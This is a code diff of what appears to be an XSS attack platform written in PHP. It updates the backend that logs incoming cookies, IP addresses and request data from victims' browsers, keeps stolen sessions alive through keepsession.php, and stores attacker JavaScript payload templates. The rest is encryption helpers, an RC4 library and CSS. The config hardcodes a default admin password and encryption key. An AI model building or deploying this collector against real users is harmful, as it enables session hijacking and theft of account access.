if($enable_encrypt) {
if($encrypt_type==="AES") {
require_once("aes.php");
$info=AESEncryptCtr($info,$encrypt_pass);
}
else {
require_once("rc4.php");
$info=base64_encode( rc4($info,$encrypt_pass) );
}
}
else
$info=base64_encode($info);
return $info;
}
function decrypt($info,$enable_encrypt,$encrypt_pass,$encrypt_type)
{
if($enable_encrypt) {
if($encrypt_type==="AES") {
require_once("aes.php");
$info=AESDecryptCtr($info,$encrypt_pass);
}
else {
require_once("rc4.php");
$info=rc4(base64_decode($info),$encrypt_pass);
}
}
else
$info=base64_decode($info);
return $info;
}
?>

14
config.php
View File

@@ -2,16 +2,22 @@
if(!defined('IN_XSS_PLATFORM')) {
exit('Access Denied');
}
//默认密码bluelotus
//后台登录密码:默认密码bluelotus
define('PASS', '2a05218c7aa0a6dbd370985d984627b8');
//记录封禁ip列表存放位置
//xss记录封禁ip列表存放目录
define('DATA_PATH', 'data');
//开启对记录封禁ip列表的AES加密
//js模板存放目录
define('JS_TEMPLATE_PATH', 'template');
//我的js存放目录
define('MY_JS_PATH', 'myjs');
//是否加密“xss记录封禁ip列表js描述”
define('ENABLE_ENCRYPT', true);
//加密密码
define('ENCRYPT_PASS', "bluelotus");
//加密方法AES或RC4
define('ENCRYPT_TYPE', "RC4");
//是否启用KEEP_SESSION功能需要外部定时访问keepsession.php
define('KEEP_SESSION', true);
//ip数据库地址
//ip归属地数据库地址
define('IPDATA_PATH', "qqwry.dat");
?>

1
diff/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

168
dio.php
View File

@@ -6,60 +6,80 @@ require_once("config.php");
require_once("functions.php");
//对记录的读写操作无数据库采用读写文件的方式文件名即请求时的时间戳同时也是记录的id
function saveInfo($info,$filename)
function save_xss_record($info,$filename)
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
!file_exists($logFile) && @touch($logFile);
if(ENABLE_ENCRYPT)
$info=encrypt($info,ENCRYPT_PASS);
else
$info=base64_encode($info);
$info=encrypt($info);
@file_put_contents($logFile, '<?php exit();?>'.$info);
if(file_put_contents($logFile, '<?php exit();?>'.$info)===false)
return false;
else
return true;
}
function loadInfo($filename)
function load_xss_record($filename)
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
if(!file_exists($logFile))
return false;
$info=@file_get_contents($logFile);
if(strncmp($info,'<?php exit();?>',15)!=0)
return false;
$info=substr($info,15);
if(ENABLE_ENCRYPT)
$info=decrypt($info,ENCRYPT_PASS);
else
$info=base64_decode($info);
if(!preg_match('/^[A-Za-z0-9\x00-\x80~!@#$%&_+-=:";\'<>,\/"\[\]\\\^\.\|\?\*\+\(\)\{\}\s]+$/',$info))
return false;
$info=json_decode($info, true);
$isChange=false;
if(!isset($info['location']))
if(strpos($filename, "..")===false && strpos($filename, "/")===false && strpos($filename, "\\")===false)
{
$info['location']=convertip($info['user_IP'],IPDATA_PATH);
$isChange=true;
}
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
if(!file_exists($logFile))
return false;
$info=@file_get_contents($logFile);
if($info===false)
return false;
if($isChange)
saveInfo(json_encode($info),$filename);
return $info;
if(strncmp($info,'<?php exit();?>',15)!=0)
return false;
$info=substr($info,15);
$info=decrypt($info);
//只会出现在加密密码错误的时候
if(!preg_match('/^[A-Za-z0-9\x00-\x80~!@#$%&_+-=:";\'<>,\/"\[\]\\\^\.\|\?\*\+\(\)\{\}\s]+$/',$info))
return false;
$info=json_decode($info, true);
//只会出现在加密密码错误的时候
if($info===false)
return false;
$isChange=false;
if(!isset($info['location']))
{
$info['location']=stripStr(convertip($info['user_IP'],IPDATA_PATH));
$isChange=true;
}
//只会出现在加密密码错误的时候
if(!isset($info['request_time']))
{
return false;
}
if($isChange)
save_xss_record(json_encode($info),$filename);
return $info;
}
else
return false;
}
function delInfo($filename)
function delete_xss_record($filename)
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
return unlink($logFile);
if(strpos($filename, "..")===false && strpos($filename, "/")===false && strpos($filename, "\\")===false)
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
return unlink($logFile);
}
else
return false;
}
function clearInfo()
function clear_xss_record()
{
$files = glob(DATA_PATH . '/*.php');
@@ -68,4 +88,74 @@ function clearInfo()
}
return true;
}
function load_js_content($path,$filename)
{
if(strpos($filename, "..")===false && strpos($filename, "/")===false && strpos($filename, "\\")===false)
{
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.js';
if(!file_exists($file))
return false;
$info=@file_get_contents($file);
if($info===false)
$info="";
return $info;
}
else
return false;
}
function delete_js($path,$filename)
{
if(strpos($filename, "..")===false && strpos($filename, "/")===false && strpos($filename, "\\")===false)
{
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc';
unlink($file);
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.js';
return unlink($file);
}
else
return false;
}
function clear_js($path)
{
$files = glob($path . '/*.desc');
foreach ($files as $file) {
unlink($file);
}
$files = glob($path . '/*.js');
foreach ($files as $file) {
unlink($file);
}
return true;
}
function save_js_content($path,$content,$filename)
{
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.js';
!file_exists($file) && @touch($file);
if(file_put_contents($file, $content)===false)
return false;
else
return true;
}
function save_js_desc($path,$desc,$filename)
{
$file = dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc';
!file_exists($file) && @touch($file);
$desc=encrypt($desc);
if(file_put_contents($file, $desc)===false)
return false;
else
return true;
}
?>

37
functions.php
View File

@@ -2,7 +2,8 @@
if(!defined('IN_XSS_PLATFORM')) {
exit('Access Denied');
}
require_once("aes.php");
require_once("config.php");
//nginx无getallheaders函数
if (!function_exists('getallheaders')) {
@@ -97,14 +98,40 @@ function isBase64Formatted($str)
return false;
}
function encrypt($info,$encryptPass)
function encrypt($info)
{
return AESEncryptCtr($info,$encryptPass);
if(ENABLE_ENCRYPT) {
if(ENCRYPT_TYPE==="AES") {
require_once("aes.php");
$info=AESEncryptCtr($info,ENCRYPT_PASS);
}
else {
require_once("rc4.php");
$info=base64_encode( rc4($info,ENCRYPT_PASS) );
}
}
else
$info=base64_encode($info);
return $info;
}
function decrypt($info,$encryptPass)
function decrypt($info)
{
return AESDecryptCtr($info,$encryptPass);
if(ENABLE_ENCRYPT) {
if(ENCRYPT_TYPE==="AES") {
require_once("aes.php");
$info=AESDecryptCtr($info,ENCRYPT_PASS);
}
else {
require_once("rc4.php");
$info=rc4(base64_decode($info),ENCRYPT_PASS);
}
}
else
$info=base64_decode($info);
return $info;
}
//基于Discuz X3.1 function_misc.php

1
guide/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

3
index.php
View File

@@ -5,6 +5,7 @@ define("IN_XSS_PLATFORM",true);
if(count($_GET)==0&&count($_POST)==0&&count($_COOKIE)==0)
exit();
*/
header("Access-Control-Allow-Origin:*");
require_once("functions.php");
require_once("dio.php");
@@ -51,5 +52,5 @@ if($decoded_cookie_data)
//判断是否keepsession判断标准get或者post或者cookie包含keepsession=1
$info['keepsession']=isKeepSession($info)?true:false;
saveInfo(json_encode($info),$request_time);
save_xss_record(json_encode($info),$request_time);
?>

2
keepsession.php
View File

@@ -21,7 +21,7 @@ if(KEEP_SESSION)
$files = glob(DATA_PATH . '/*.php');
foreach ($files as $file) {
$filename=basename($file,".php");
$info=loadInfo($filename);
$info=load_xss_record($filename);
if($info['keepsession']===true)
{
$url=getLocation($info);

19
login.php
View File

@@ -21,7 +21,7 @@ if(isset($_SESSION['isLogin']) && $_SESSION['isLogin']===true)
//判断ip是否在封禁列表中
$forbiddenIPList=loadForbiddenIPList();
$ip=$_SERVER['REMOTE_ADDR'];
if(!isset($forbiddenIPList[$ip]) || $forbiddenIPList[$ip]<3)
if(!isset($forbiddenIPList[$ip]) || $forbiddenIPList[$ip]<=5)
{
if(isset($_POST['password']) && $_POST['password']!="")
{
@@ -54,9 +54,13 @@ function loadForbiddenIPList()
{
$logfile = DATA_PATH . '/forbiddenIPList.dat';
!file_exists( $logfile ) && @touch( $logfile );
$str = file_get_contents( $logfile );
if(ENABLE_ENCRYPT)
$str =decrypt($str,ENCRYPT_PASS);
$str = @file_get_contents( $logfile );
if($str===false)
return array();
$str =decrypt($str);
if($str!='')
{
$result=json_decode($str,true);
@@ -74,8 +78,7 @@ function saveForbiddenIPList($forbiddenIPList)
$logfile = DATA_PATH . '/forbiddenIPList.dat';
!file_exists( $logfile ) && @touch( $logfile );
$str=json_encode($forbiddenIPList);
if(ENABLE_ENCRYPT)
$str = encrypt($str,ENCRYPT_PASS);
$str = encrypt($str);
@file_put_contents($logfile, $str);
}
@@ -132,10 +135,12 @@ function generate_password( $length = 32 ) {
<form action="" method="post">
<input type="password" placeholder="password" id="password" name="password" required="required">
<input id="firesunCheck" type="hidden" name="firesunCheck" value=<?php $firesunCheck=generate_password(32); $_SESSION['firesunCheck']=$firesunCheck;echo json_encode($_SESSION['firesunCheck']);?> />
<button type="submit" id="submit">
<button type="submit" id="submit" disabled="disabled">
<i class="fa fa-arrow-right">
</i>
</button>
</form>
<div id="note">
<a href="#">

5
myjs/.htaccess Normal file
View File

@@ -0,0 +1,5 @@
<Files ~ "\.js$">
Order allow,deny
Allow from all
</Files>
deny from all

1
myjs/copyright.desc Normal file
View File

@@ -0,0 +1 @@
syO5RRHIMbW3QFs5

1
myjs/copyright.js Normal file
View File

@@ -0,0 +1 @@
alert("Powered by 火日攻天@Firesun");

1
myjs/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

84
rc4.php Normal file
View File

@@ -0,0 +1,84 @@
<?php
/*
* Copyright 2011 Michael Cutler <m@cotdp.com>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* A PHP implementation of RC4 based on the original C code from
* the 1994 usenet post:
*
* http://groups.google.com/groups?selm=sternCvKL4B.Hyy@netcom.com
*
* @param key_str the key as a binary string
* @param data_str the data to decrypt/encrypt as a binary string
* @return the result of the RC4 as a binary string
* @author Michael Cutler <m@cotdp.com>
*/
function rc4($data_str , $key_str) {
// convert input string(s) to array(s)
$key = array();
$data = array();
for ( $i = 0; $i < strlen($key_str); $i++ ) {
$key[] = ord($key_str{$i});
}
for ( $i = 0; $i < strlen($data_str); $i++ ) {
$data[] = ord($data_str{$i});
}
// prepare key
$state = array( 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,
48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,
64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,
80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,
96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,
112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,
128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,
144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,
160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,
176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,
192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,
208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,
224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,
240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255 );
$len = count($key);
$index1 = $index2 = 0;
for( $counter = 0; $counter < 256; $counter++ ){
$index2 = ( $key[$index1] + $state[$counter] + $index2 ) % 256;
$tmp = $state[$counter];
$state[$counter] = $state[$index2];
$state[$index2] = $tmp;
$index1 = ($index1 + 1) % $len;
}
// rc4
$len = count($data);
$x = $y = 0;
for ($counter = 0; $counter < $len; $counter++) {
$x = ($x + 1) % 256;
$y = ($state[$x] + $y) % 256;
$tmp = $state[$x];
$state[$x] = $state[$y];
$state[$y] = $tmp;
$data[$counter] ^= $state[($state[$x] + $state[$y]) % 256];
}
// convert output back to a string
$data_str = "";
for ( $i = 0; $i < $len; $i++ ) {
$data_str .= chr($data[$i]);
}
return $data_str;
}
?>

205
static/css/Site.css
View File

@@ -1,205 +0,0 @@
html, body, div, span, iframe,
h1, h2, h3, h4, h5, h6, p, a, img, dl, dt, dd, ol, ul, li,
table, tfoot, thead, tr, th, td,
article, aside, canvas, details, footer, header, section {
margin: 0;
padding: 0;
border: 0;
font-size: 100%;
font: inherit;
}
/* HTML5 display-role reset for older browsers */
body {
line-height: 1;
font-size: 12px;
}
ol, ul {
list-style: none;
}
html, body {
height: 100%;
font-family: 'Microsoft YaHei','Open Sans',arial,sans-serif;
}
html,
body,
.container-fluid,
.row,
.column{
height: 100%;
}
/* font */
@font-face {
font-family: 'icomoon';
src:url('../fonts/icomoon.eot?c8m22a');
src:url('../fonts/icomoon.eot?#iefixc8m22a') format('embedded-opentype'),
url('../fonts/icomoon.woff?c8m22a') format('woff'),
url('../fonts/icomoon.ttf?c8m22a') format('truetype'),
url('../fonts/icomoon.svg?c8m22a#icomoon') format('svg');
font-weight: normal;
font-style: normal;
}
[class^="icon-"], [class*=" icon-"] {
font-family: 'icomoon';
speak: none;
font-style: normal;
font-weight: normal;
font-variant: normal;
text-transform: none;
line-height: 1;
/* Better Font Rendering =========== */
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.icon-logout:before {
content: "\e900";
}
.icon-info:before {
content: "\e904";
}
.icon-template:before {
content: "\e901";
}
.icon-my-js:before {
content: "\e903";
}
.icon-panel:before {
content: "\e902";
}
.icon {
margin-right: 0.917em;
}
/* Bootstrap overrides*/
.row,
.container-fluid {
padding: 0;
margin: 0;
}
.column{
padding-left: 0;
padding-right: 0;
}
.windows {
-moz-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
-webkit-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
}
/* Nav section */
#nav-section{
background-color: #35373d;
width: 220px;
float: left;
height: 100%;
}
#nav-section li {
border-bottom: 1px solid #4a4b51;
white-space:nowrap;
font-size: 11px;
line-height: 11px;
}
#nav-section li a {
color: #b8bbc2;
text-transform: uppercase;
text-decoration: none;
margin-left: 2em;
font-size: 14px;
padding: 2em 1.2em;
}
#nav-section li:hover {
background-color: #212329;
}
#nav-section li.active {
background-color: #0d1016;
}
.nav > li > a:hover,
.nav > li > a:focus {
background: none;
}
#dash-logo {
color: #fff;
background-color: #1996e4;
text-align: center;
}
#sidebar-nav{
padding: 0;
}
#rights {
width:100%;
color: #848690;
font-size: 12px;
position: absolute;
bottom: 10px;
text-align: center;
line-height: 120%;
}
/* Toggle button */
#toggle-button {
margin-top: 27px;
border: none;
}
#toggle-button:hover,
#toggle-button:focus {
background-color: transparent;
}
#toggle-button .icon-bar {
background-color: #fff;
}
/* Main section */
.main-section {
float: none;
width: auto;
overflow: hidden;
height: 100%;
background-color: #eee;
}
#dash-logo,
.main-section-header > h2{
font-size: 18px;
text-transform: uppercase;
line-height: 26px;
padding-top: 30px;
padding-bottom: 30px;
}
.main-section-header > h2 {
padding-left: 1.667em;
white-space: nowrap;
}
.main-section-header {
height: auto;
border-bottom: 1px solid #ededee;
-moz-box-shadow: 1px 0 4px #ededee;
-webkit-box-shadow: 1px 0 4px #ededee;
box-shadow: 1px 0 4px #ededee;
background-color: #fff;
}

1
static/css/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

14
static/css/jqx.office.css
View File

@@ -70,12 +70,12 @@
border-radius: 0px;
}
.jqx-widget-office {
font-family: Calibri;
font-family: 'Microsoft YaHei',Calibri;
}
.jqx-widget-content-office{font-family: Calibri; border-color: #d4d4d4; color: #444444; background-color: #fff;}
.jqx-widget-header-office{font-family: Calibri; color: #444444; border-color:#d4d4d4; background-color:#ffffff;}
.jqx-widget-content-office{font-family: 'Microsoft YaHei',Calibri; border-color: #d4d4d4; color: #444444; background-color: #fff;}
.jqx-widget-header-office{font-family: 'Microsoft YaHei',Calibri; color: #444444; border-color:#d4d4d4; background-color:#ffffff;}
.jqx-fill-state-normal-office{font-family: Calibri; border-color: #d4d4d4; color: #444444; background: #fdfdfd;}
.jqx-fill-state-normal-office{font-family: 'Microsoft YaHei',Calibri; border-color: #d4d4d4; color: #444444; background: #fdfdfd;}
.jqx-grid-cell-sort-alt-office, .jqx-grid-cell-filter-alt-office, .jqx-grid-cell-pinned-office, .jqx-grid-cell-alt-office, .jqx-grid-cell-sort-office{ background:#ededed; color: #000;}
.jqx-button-office {border-color: #d4d4d4;}
.jqx-fill-state-hover-office{border-color:#86bfa0; color: #000; background:#d3f0e0;}
@@ -84,7 +84,7 @@
.jqx-fill-state-pressed-office{border-color:#429366; color: #000; background:#86bfa0;}
.jqx-scrollbar-state-normal-office, .jqx-grid-bottomright-office, .jqx-panel-bottomright-office, .jqx-listbox-bottomright-office{background:#f3f3f3;}
.jqx-widget-office .jqx-grid-column-header-office, .jqx-grid-cell-office, .jqx-widget-office .jqx-grid-cell-office, .jqx-widget-office .jqx-grid-group-cell-office, .jqx-grid-group-cell-office{font-family: Calibri; border-color:#f3f3f3;}
.jqx-widget-office .jqx-grid-column-header-office, .jqx-grid-cell-office, .jqx-widget-office .jqx-grid-cell-office, .jqx-widget-office .jqx-grid-group-cell-office, .jqx-grid-group-cell-office{font-family: 'Microsoft YaHei',Calibri; border-color:#f3f3f3;}
.jqx-tabs-title-bottom-office, .jqx-tabs-title-office{color: #666666;}
.jqx-tabs-title-hover-bottom-office, .jqx-tabs-title-hover-top-office{color: #217346; background: transparent; border-color: transparent;}
.jqx-tabs-title-selected-bottom-office, .jqx-tabs-selection-tracker-bottom-office, .jqx-tabs-title-selected-top-office, .jqx-tabs-selection-tracker-top-office{font-weight: bold; color: #217346; border-color:#d4d4d4; border-bottom:1px solid #fff; background:#fff}
@@ -94,8 +94,8 @@
background-color: transparent;
border-color: #d4d4d4;
}
.jqx-input-button-header-office, .jqx-calendar-title-header-office, .jqx-grid-office .jqx-widget-header-office, .jqx-grid-header-office, .jqx-grid-column-header-office, .jqx-grid-office {font-family: Calibri; border-color: #d4d4d4; color: #444444; background: #fff;}
.jqx-window-header-office{font-family: Calibri; color: #444444; background: #fff;}
.jqx-input-button-header-office, .jqx-calendar-title-header-office, .jqx-grid-office .jqx-widget-header-office, .jqx-grid-header-office, .jqx-grid-column-header-office, .jqx-grid-office {font-family: 'Microsoft YaHei',Calibri; border-color: #d4d4d4; color: #444444; background: #fff;}
.jqx-window-header-office{font-family: 'Microsoft YaHei',Calibri; color: #444444; background: #fff;}
.jqx-grid-column-menubutton-office {
background-image: url('../images/office-icon-down.png');
}

228
static/css/login.css
View File

@@ -1,174 +1,174 @@
* {
margin: 0px;
padding: 0px;
margin: 0px;
padding: 0px;
}
body {
background: #222526;
position: relative;
font-family: 'Microsoft YaHei',verdana;
background: #222526;
position: relative;
font-family: 'Microsoft YaHei',verdana;
}
#loginform {
position: relative;
width: 300px;
left: 50%;
margin-left: -150px;
top: 45%;
height: 190px;
margin-top: -190px;
position: relative;
width: 300px;
left: 50%;
margin-left: -150px;
top: 45%;
height: 190px;
margin-top: -190px;
}
input {
display: block;
margin: 21px auto 15px;
border-radius: 5px;
background: #333333;
width: 85%;
padding: 12px 20px 12px 10px;
border: none;
color: #929999;
box-shadow: inset 0px 1px 5px #272727;
font-size: 0.8em;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
display: block;
margin: 21px auto 15px;
border-radius: 5px;
background: #333333;
width: 85%;
padding: 12px 20px 12px 10px;
border: none;
color: #929999;
box-shadow: inset 0px 1px 5px #272727;
font-size: 0.8em;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
input:focus {
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
box-shadow: 0px 0px 5px 1px #161718;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
box-shadow: 0px 0px 5px 1px #161718;
}
button {
background: #ff5f32;
border-radius: 50%;
border: 10px solid #222526;
font-size: 0.9em;
color: #fff;
font-weight: bold;
cursor: pointer;
width: 85px;
height: 85px;
position: absolute;
right: -42px;
top: 54px;
text-align: center;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
background: #ff5f32;
border-radius: 50%;
border: 10px solid #222526;
font-size: 0.9em;
color: #fff;
font-weight: bold;
cursor: pointer;
width: 85px;
height: 85px;
position: absolute;
right: -42px;
top: 54px;
text-align: center;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
button:hover {
background: #222526;
border-color: #ff5f32;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
background: #222526;
border-color: #ff5f32;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
button i {
font-size: 20px;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
font-size: 20px;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
button:hover i {
color: #ff5f32;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
color: #ff5f32;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
*:focus {
outline: none;
outline: none;
}
::-webkit-input-placeholder {
color: #929999;
color: #929999;
}
:-moz-placeholder {
/* Firefox 18- */
color: #929999;
color: #929999;
}
::-moz-placeholder {
/* Firefox 19+ */
color: #929999;
color: #929999;
}
:-ms-input-placeholder {
color: #929999;
color: #929999;
}
h1 {
text-align: center;
color: #fff;
font-size: 16px;
padding: 12px 0px;
text-align: center;
color: #fff;
font-size: 16px;
padding: 12px 0px;
}
#note {
color: #88887a;
font-size: 0.8em;
text-align: left;
padding-left: 5px;
color: #88887a;
font-size: 0.8em;
text-align: left;
padding-left: 5px;
}
a {
color: #88887a;
text-decoration: none;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
color: #88887a;
text-decoration: none;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
a:hover {
color: #fff;
margin-left: 5px;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
color: #fff;
margin-left: 5px;
-webkit-transition: 0.5s ease;
-moz-transition: 0.5s ease;
-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
#mainlogin {
float: left;
width: 250px;
height: 170px;
padding: 10px 15px;
position: relative;
background: #555555;
border-radius: 3px;
-moz-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
-webkit-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
float: left;
width: 250px;
height: 170px;
padding: 10px 15px;
position: relative;
background: #555555;
border-radius: 3px;
-moz-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
-webkit-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
}
#logo {
background: url(../images/logo.png);
height: 180px;
width: 300px;
margin-left: 17px;
margin-bottom: 10px;
background-repeat: no-repeat;
}
background: url(../images/logo.png);
height: 180px;
width: 300px;
margin-left: 17px;
margin-bottom: 10px;
background-repeat: no-repeat;
}

479
static/css/main.css Normal file
View File

@@ -0,0 +1,479 @@
html, body, div, span, iframe,
h1, h2, h3, h4, h5, h6, p, a, img, dl, dt, dd, ol, ul, li,
table, tfoot, thead, tr, th, td,
article, aside, canvas, details, footer, header, section {
margin: 0;
padding: 0;
border: 0;
font-size: 100%;
font: inherit;
}
/* HTML5 display-role reset for older browsers */
body {
line-height: 1;
font-size: 12px;
}
ol, ul {
list-style: none;
}
html, body {
height: 100%;
font-family: 'Microsoft YaHei','Open Sans',arial,sans-serif;
}
html,
body,
.container-fluid,
.row,
.column {
height: 100%;
}
/* font */
@font-face {
font-family: 'icomoon';
src:url('../fonts/icomoon.eot?c8m22a');
src:url('../fonts/icomoon.eot?#iefixc8m22a') format('embedded-opentype'),
url('../fonts/icomoon.woff?c8m22a') format('woff'),
url('../fonts/icomoon.ttf?c8m22a') format('truetype'),
url('../fonts/icomoon.svg?c8m22a#icomoon') format('svg');
font-weight: normal;
font-style: normal;
}
[class^="icon-"], [class*=" icon-"] {
font-family: 'icomoon';
speak: none;
font-style: normal;
font-weight: normal;
font-variant: normal;
text-transform: none;
line-height: 1;
/* Better Font Rendering =========== */
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.icon-logout:before {
content: "\e900";
}
.icon-info:before {
content: "\e904";
}
.icon-template:before {
content: "\e901";
}
.icon-my-js:before {
content: "\e903";
}
.icon-panel:before {
content: "\e902";
}
.icon {
margin-right: 0.917em;
}
/* Bootstrap overrides*/
.row,
.container-fluid {
padding: 0;
margin: 0;
}
.column {
padding-left: 0;
padding-right: 0;
}
/* Nav section */
#nav-section {
background-color: #35373d;
width: 220px;
float: left;
height: 100%;
}
#nav-section li {
border-bottom: 1px solid #4a4b51;
white-space: nowrap;
font-size: 11px;
line-height: 11px;
}
#nav-section li a {
color: #b8bbc2;
text-transform: uppercase;
text-decoration: none;
margin-left: 2em;
font-size: 14px;
padding: 2em 1.2em;
}
#nav-section li:hover {
background-color: #212329;
}
#nav-section li.active {
background-color: #0d1016;
}
.nav > li > a:hover,
.nav > li > a:focus {
background: none;
}
#dash-logo {
color: #fff;
background-color: #1996e4;
text-align: center;
}
#sidebar-nav {
padding: 0;
}
#rights {
width: 100%;
color: #848690;
font-size: 12px;
position: absolute;
bottom: 10px;
text-align: center;
line-height: 120%;
}
/* Toggle button */
#toggle-button {
margin-top: 27px;
border: none;
}
#toggle-button:hover,
#toggle-button:focus {
background-color: transparent;
}
#toggle-button .icon-bar {
background-color: #fff;
}
/* Main section */
.main-section {
float: none;
width: auto;
overflow: hidden;
height: 100%;
background-color: #eee;
}
#dash-logo,
.main-section-header > h2 {
font-size: 18px;
text-transform: uppercase;
line-height: 26px;
padding-top: 30px;
padding-bottom: 30px;
}
.main-section-header > h2 {
padding-left: 1.667em;
white-space: nowrap;
}
.main-section-header {
height: auto;
border-bottom: 1px solid #ededee;
-moz-box-shadow: 1px 0 4px #ededee;
-webkit-box-shadow: 1px 0 4px #ededee;
box-shadow: 1px 0 4px #ededee;
background-color: #fff;
}
/* 一些常用的style类 */
.overflow-hidden {
overflow: hidden;
}
.display-none {
display: none;
}
.clear {
clear: both;
}
/* 提示窗体样式 */
.windows {
-moz-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
-webkit-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
}
.windows-tip-div {
margin: 3px;
}
.windows-button-div {
float: right;
margin-top: 15px;
}
.windows-button {
margin-right: 10px;
}
#search_input_field {
width: 200px;
height: 23px;
}
.dropdownlist {
margin-top: 5px;
}
.search_div {
margin-top: 7px;
clear: both;
}
.search_input_field {
margin-top: 5px;
}
#findButton {
margin-top: 15px;
margin-left: 50px;
float: left;
}
#clearButton {
margin-left: 5px;
margin-top: 15px;
float: left;
}
/* js列表 */
.listbox {
border: none;
}
.listbox_toolbar {
position: relative;
height: 40px;
}
#myJS_add_button,
#myJS_del_button,
#myJS_clear_button,
#jsTemplate_add_button,
#jsTemplate_del_button,
#jsTemplate_clear_button {
float: left;
margin-left: 5px;
}
.listbox_toolbar_button_icon {
position: relative;
margin-top: 2px;
}
.listbox_toolbar_button_span {
margin-left: 4px;
position: relative;
top: 3px;
}
.listbox_item_table {
min-width: 130px;
}
.listbox_item_img {
width: 40px;
}
.listbox_item_name {
padding: 0px 5px;
font-weight: bold;
font-size: 14px;
}
.listbox_item_description {
padding: 0px 5px;
}
/* js编辑面板 */
.js_content_panel {
margin: 20px;
}
.js_content_div {
margin: 5px;
}
.js_content_button_div {
text-align: center;
margin: 5px auto;
}
/* 编辑器样式 */
.editor {
border: 1px solid #d4d4d4;
margin: 10px 5px;
}
#myJS_content, #jsTemplate_content {
width: "98%";
}
/* xssor */
#Ww_B_0 {
margin: 10px;
}
#Ww_B_0_Left {
width: 310px;
